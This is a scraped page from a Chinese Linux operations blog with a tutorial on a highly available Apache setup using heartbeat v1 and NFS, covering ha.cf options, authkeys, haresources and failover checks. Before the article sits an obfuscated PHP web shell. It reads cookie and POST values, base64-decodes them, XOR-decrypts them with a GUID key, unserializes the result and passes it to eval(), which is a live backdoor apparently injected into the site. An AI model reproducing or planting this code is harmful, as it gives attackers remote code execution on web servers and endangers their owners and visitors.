$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} heartbeatV1+nfs实现高可用httpd | Linux运维部落

heartbeatV1+nfs实现高可用httpd

    随着互联网技术的不断发展,Web应用也越来越普遍,Web服务器的无故障工作时间就显得尤重要,但由于各种各样的原因,一台服务器并不能保证永远不出问题的运行,此时就需要一种机制来实现多台服务器共同为相同的来务功能提供服务,以确保任意一台服务器宕机后,不会影响其所承载的业务的访问。  

    下面演示使用HA工具heartbeatV1来实现Web应用的高可用性。

    注:由于条件所限,只能以一台NFS服务器做为后端的存储设备,其实这本身就一个单点故障风险点,在生产环境中应该有更加完善的存储解决方案。

    一、拓扑图

blob.png

    二、环境准备

        1、设置/etc/hosts

            为保证能够正常的解决到各节点的主机名,需要设置/etc/hosts文件,当然也可以设置DNS。

1.png            另外两台节点也做同样的设置。

        2、设置节点间的相互信任,即ssh密钥

2.png

        将密钥复制到另外两个节点:

3.png

        在另外node2和node3上做同样操作。

        3、同步各节点的时间

        4、下载heartbeat程序包 

            可以到下面的地址进行下载:http://down.51cto.com/data/1872114

     三、安装heartbeat程序

        安装heartbeat程序前需要先安装一些依赖的软件,请先自行配置好epel源及base yum源。

4.png

        hearbeat程序需要安装如下图所示的三个RPM包即可。

5.png

        在另外两个节点上做同样的操作。

    四、配置heartbeat

        将配置文件的模块复制到/etc/ha.d目录中。

5.png

        1、配置ha.cf文件

6.png

        ha.cf配置文件部分参数说明:

            autojoin none:集群中的节点不会自动加入;

            logfile /var/log/ha-log:heartbeat的日志存放位置;

            keepalive 2:指定心跳使用间隔时间为2秒(即每两秒钟发送一次广播);

            deadtime 30:指定备用节点在30秒内没有收到主节点的心跳信号后,则立即接管主节点的服务资源;

            warntime 10:指定心跳延迟的时间为十秒。当10秒钟内备份节点不能接收到主节点的心跳信号时,就会往日志中写入一个警告日志,但此时不会切换服务;

            initdead 120:在某些系统上,系统启动或重启之后需要经过一段时间网络才能正常工作,该选项用于解决这种情况产生的时间间隔。取值至少为deadtime的两倍;

            udpport 694:设置广播通信使用的端口,694为默认使用的端口号。

            baud    19200:设置串行通信的波特率       

            bcast   eth0:Linux  指明心跳使用以太网广播方式,并且是在eth0接口上进行广播;

            mcast eth0 225.0.0.1 694 1 0:采用网卡eth0的Udp多播来组织心跳,一般在备用节点不止一台时使用;        ucast eth0 192.168.1.2:采用网卡eth0的udp单播来组织心跳,后面跟的IP地址应为双机对方的IP地址; 

                bcast、ucast和mcast分别代表广播、单播和多播,是组织心跳的三种方式,任选其一即可。

            auto_failback on:用来定义当主节点恢复后,是否将服务自动切回;

            stonith baytech /etc/ha.d/conf/stonith.baytech:stonith的主要作用是使出现问题的节点从集群环境中脱离,进而释放集群资源,避免两个节点争用一个资源的情形发生。保证共享数据的安全性和完整性;

            watchdog /dev/watchdog:该选项是可选配置,是通过Heartbeat来监控系统的运行状态;

            ping 192.168.2.1:选择ping的节点,ping 节点选择的越好,HA集群就越强壮,可以选择固定的路由器作为ping节点,但是最好不要选择集群中的成员作为ping节点,ping节点仅仅用来测试网络连接;

            ping_group group1 192.168.12.120 192.168.12.237:类似于ping,ping一组ip地址。

        2、配置authkeys文件

            此文件用于配置认证相关的信息,文件权限必须为600。

            先生成一个随机码:

1.png

            在/etc/ha.d/authkeys文件中添加如下内容:

2.png

            注意两行中的数字1是相对应的,如果修改为其它数字,两行要同时修改。

            修改文件的权限:

3.png

        3、在haresources文件中添加资源

1.png

           注意:node1.test.com必须与uname -n所显示内容相同,192.168.2.100为VIP,即客户端访问的IP地址,httpd即指明高可用所针对的服务。

        4、将上面配置的三个文件复制到node2和node3上的相同目录中

2.png

3.png

        5、在三个节点分别安装httpd服务,并且在分别建立三个主页,主页内容分别为三个节点的主机名,并且启动httpd服务,测试是否可以访问页面的内容;主要是为了用于测试故障转移的效果,此操作就不做演示了。

        6、停止httpd服务,启动heartbeat服务

4.png

6.png

        7、验证

            查看VIP是否启动

7.png

8.png

9.png

        测试Web应用 

10.png

        将node1下线后,自动切换到node2节点上

11.png

        将node1与node2同时下线,node3就顶替了下来;

12.png

        ha.cf中的默认设置在node1上线后会自动恢复主节点的身份,请自行验证。

    五、设置NFS共享目录

        经过上面的设置,heartbeat已经可以正常工作了,下面我们来使用NFS共享来为httpd服务提供主页面。

        1、配置NFS服务器

            如果服务器上没有nfs软件请先安装nfs-utils软件。

            修改配置文件:

1.png

            启动nfs服务:

2.png

            本地验证:

3.png

        2、在共享目录中提供主页

4.png        3、在节点服务器上停止heartbeat服务,并启动httpd服务

5.png

        4、挂载NFS共享目录,并访问测试

6.png

            由于是最小化安装,在挂载nfs时会报上面的错误,安装showmount命令后即可解决。

7.png

            使用curl命令来测试,可以访问,如下图所示:

8.png

            在其它节点上也可以按照上面的操作进行测试,确保nfs共享目录可以被挂载。

    六、修改haresources配置文件

        修改haresources配置文件,使heartbeat能够自动挂载nfs共享目录。

7.png

    七、停止httpd服务、卸载nfs共享目录并且启动heartbeat服务

        service httpd stop 

        umount /var/www/html

        service heartbeat start

        下面是heartbeat启动后的结果,可以看到nfs目录已经被自动挂载了。

8.png1.png

    八、将haresources文件复制到其它节点服务器上

2.png

    九、验证

        访问192.168.2.100可以访问到共享目录中创建的页面,并且即使有节点服务器宕机了,也不会影响页面的访问,请自行验证。

4.png

原创文章,作者:petmaster,如若转载,请注明出处:http://www.178linux.com/5565

(0)
上一篇 2015-06-25 10:12
下一篇 2015-06-26 10:11

相关推荐

  • 利用 yum 查找某个命令属于哪个包

    当我们在安装一个不熟悉的命令是,会遇到个问题:Error: Nothing to do 而你又不知道该命令的是属于哪个rom包,莫慌~我们可以借助一个叫yum的基于rpm的软件包管理器。 以 dig 这个命令为例,当我安装它时会出现如下情况  [root@localhost ~]# yum install dig  Loaded plug…

    Linux干货 2016-03-27
  • linux中的管道符

    管道符 less只能看文件 但是这样做会产生一个垃圾文件ls.txt,所以下面我们就会需要用到管道符 |只将传递正确结果传递给 而使用这两种方法可以传递正确和错误的结果[root@localhost ~]# ls /etc/passwd /cpp/passwd 2>&1|less   ,  (2>&1…

    2017-07-22
  • 文本查看工具、grep及正则表达式

    cat [OPTION]… [FILE]…顺序查看文件-E: 显示行结束符$-n: 对显示出的每一行进行编号(包括空白行)-A:显示所有控制符-T:显示制表符^I(即tab键)-b:只对非空白行进行编号-s:压缩连续的空行成一行 tac 逆序查看文件(第一行变为最后一行) rev 行内逆序查看文件(第一个字符变为最后一个字符) mor…

    Linux干货 2016-08-11
  • 设计模式(五)适配器模式Adapter(结构型)

    1. 概述:          接口的改变,是一个需要程序员们必须(虽然很不情愿)接受和处理的普遍问题。程序提供者们修改他们的代码;系统库被修正;各种程序语言以及相关库的发展和进化。         例子1:iphone…

    Linux干货 2015-06-25
  • Function函数实例

    函数:function     把一段独立功能的代码当做一个整体,而后为之取一个名字,命令的代码段,即为函数。 注意:     定义函数的代码段不会自动执行,在调用时执行;所谓调用函数,在代码中给定函数名即可     函数名出现的任何位置,…

    Linux干货 2016-08-21
  • Find小总结及应用

    Find总结及应用 搜索命令:     locate命令:         在文件系统上查找符合条件的文件         非实时查找( 数据库查找)…

    Linux干货 2016-08-16